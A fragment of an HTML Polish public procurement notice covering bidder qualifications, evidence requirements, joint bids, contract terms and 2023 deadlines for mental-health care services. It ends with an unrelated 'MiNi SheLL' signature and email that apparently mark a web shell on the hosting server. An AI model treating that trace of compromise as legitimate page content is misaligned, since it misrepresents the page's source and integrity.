mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>•	spełniają warunki udziału w postępowaniu określone w ust. 2,<br/>•	nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 Prawa zamówień publicznych, na zasadach określonych w ust. 4, a także art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835 z późn. zm.), zwanej w dalszej części „ustawą sankcyjną”.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>•	zdolności do występowania w obrocie gospodarczym:<br/>•	uprawnień do prowadzania określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>•	sytuacji finansowej lub ekonomicznej,<br/>•	zdolności technicznej lub zawodowej.<br/>Opis warunków udziału w postępowaniu:<br/>Lp.	Warunki udziału w postępowaniu dotyczące:<br/>1	zdolności do występowania w obrocie gospodarczym:<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2	uprawnień do prowadzania określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>3	sytuacji finansowej lub ekonomicznej:<br/><br/>Zamawiający uzna, że Wykonawca spełni warunek dotyczący sytuacji finansowej lub ekonomicznej, jeżeli:<br/>-wykaże ,że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 20 000, 00 zł (słownie: dwadzieścia tysięcy złotych 00/100). Ubezpieczenie będzie kontynuowane przez cały okres obowiązywania umowy na zasadach określonych w projektowanych postanowieniach umowy.<br/><br/>4	zdolności technicznej lub zawodowej<br/><br/>Zamawiający uzna, że Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, jeżeli:<br/>→ wykaże, że posiada następujące doświadczenie:<br/><br/>- Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty usługi (usługę) które odpowiadają rodzajem usługom stanowiącym przedmiot zadania, dla łącznie przynajmniej 5 osób, które obejmowały łącznie przynajmniej 1344 godzin. W przypadku świadczeń okresowych lub ciągłych Zamawiający dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane. W takim przypadku część zamówienia już faktycznie wykonana musi spełniać wymogi określone w Specyfikacji Warunków Zamówienia, tj. usługi muszą być zrealizowane dla łącznie przynajmniej 5 osób i muszą obejmować zrealizowanie łącznie przynajmniej 1344 godzin,<br/><br/> <br/>→ wykaże, że:<br/>dysponuje lub będzie dysponował na czas realizacji zamówienia osobami zdolnymi wykonać zamówienie (skierowanymi przez Wykonawcę do realizacji przedmiotowych usług):<br/>• koordynatorem specjalistycznych usług dla osób z zaburzeniami psychicznymi (którego zadaniem będzie m.in. przyjmowanie zgłoszeń od Zamawiającego, planowanie, rozliczanie godzin, kontrola prawidłowości realizacji usług). Koordynator specjalistycznych usług powinien posiadać wykształcenie co najmniej średnie,<br/>• osobami posiadającymi kwalifikacje do świadczenia specjalistycznych usług dla osób z zaburzeniami psychicznymi, określone w rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych - w liczbie nie mniejszej niż 4 (cztery). Żadna z osób świadczących usługi nie może być osobą karaną za przestępstwo, a także nie może figurować w Krajowym Rejestrze Karnym lub w Rejestrze Sprawców Przestępstw na Tle Seksualnym, o którym mowa w ustawie z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym (Dz. U. z 2020 r. poz. 152 z późn. zm.) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2. Na odrębne wezwanie Zamawiającego Wykonawca jest zobowiązany do złożenia w wyznaczonym<br/>terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych,<br/>aktualnych na dzień złożenia - tj.:<br/><br/>•	dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanie z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego w Rozdziale III ust. 2 SWZ<br/>•	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami - według wzoru stanowiącego załącznik nr 5 do Specyfikacji Warunków Zamówienia<br/>•	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały<br/>wykonane lub są wykonywane (wzór wykazu usług stanowi załącznik nr 6 do Specyfikacji Warunków<br/>Zamówienia), oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są<br/>wykonywane należycie,<br/>Dowodami potwierdzającymi czy usługi zostały wykonane lub są wykonywane należycie, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wraz z ofertą Wykonawca składa następujące oświadczenia:<br/>1)	oświadczenie, o którym mowa w art. 125 ust. 1 Prawa zamówień publicznych o niepodleganiu<br/>wykluczeniu oraz spełnieniu warunków udziału w postępowaniu, w zakresie wskazanym w Rozdziale<br/>III ust. 2 Specyfikacji Warunków Zamówienia, według wzoru stanowiącego załącznik nr 2 do<br/>Specyfikacji Warunków Zamówienia,<br/>2)	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby na zasadach określonych w Rozdziale III ust. 3 Specyfikacji Warunków Zamówienia,<br/>przedstawia z oświadczeniem, o którym mowa w pkt 1, także oświadczenie podmiotu<br/>udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełniania<br/>warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby -<br/>zgodnie z załącznikiem nr 3 do Specyfikacji Warunków Zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Pełnomocnictwo, o którym mowa w ust. 2 należy dołączyć do oferty. <br/>4. Wykonawcy składający ofertę wspólną ponoszą solidarną odpowiedzialność.<br/>5. Oświadczenia, o których mowa w Rozdziale IV ust. 1 pkt 1 Specyfikacji Warunków Zamówienia składa każdy Wykonawca, warunek musi zostać spełniony przez każdego Wykonawcę indywidualnie.<br/>6. Dokumenty, o których mowa w Rozdziale IV ust. 2 Specyfikacji Warunków Zamówienia składa przynajmniej jeden Wykonawca lub osobne dokumenty składa kilku Wykonawców. Warunek posiadania zdolności technicznej lub zawodowej - będzie spełniony gdy jego spełnianie potwierdzi indywidualnie przynajmniej jeden Wykonawca lub gdy kilku Wykonawców jego spełnienie potwierdzi łącznie.<br/>7. W odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują usługi, do realizacji których te zdolności są wymagane.<br/>8. W przypadku, o którym mowa w ust. 7 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do dołączenia do oferty oświadczenia, z którego wynika, jaki zakres przedmiotu zamówienia wykonują poszczególni Wykonawcy (zgodnie z art. 117 ust. 4 Prawa zamówień publicznych) - wzór oświadczenia stanowi załącznik nr 7 do Specyfikacji Warunków Zamówienia.<br/>9. Wspólnicy spółki cywilnej są Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia i mają do nich zastosowanie zasady określone w ust. 2-3, chyba, że pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę.<br/>10. Przed zawarciem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić Zamawiającemu kopię umowy regulującej współpracę tych Wykonawców, zawierającą co najmniej:<br/>•	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>•	zakres działania poszczególnych stron umowy,<br/>•	czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia<br/>11. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3.	Zamawiający przewiduje możliwość zmiany umowy, na zasadach wskazanych w projektowanych postanowieniach umownych stanowiących załącznik nr 8 do Specyfikacji Warunków Zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamówienia.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-19 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com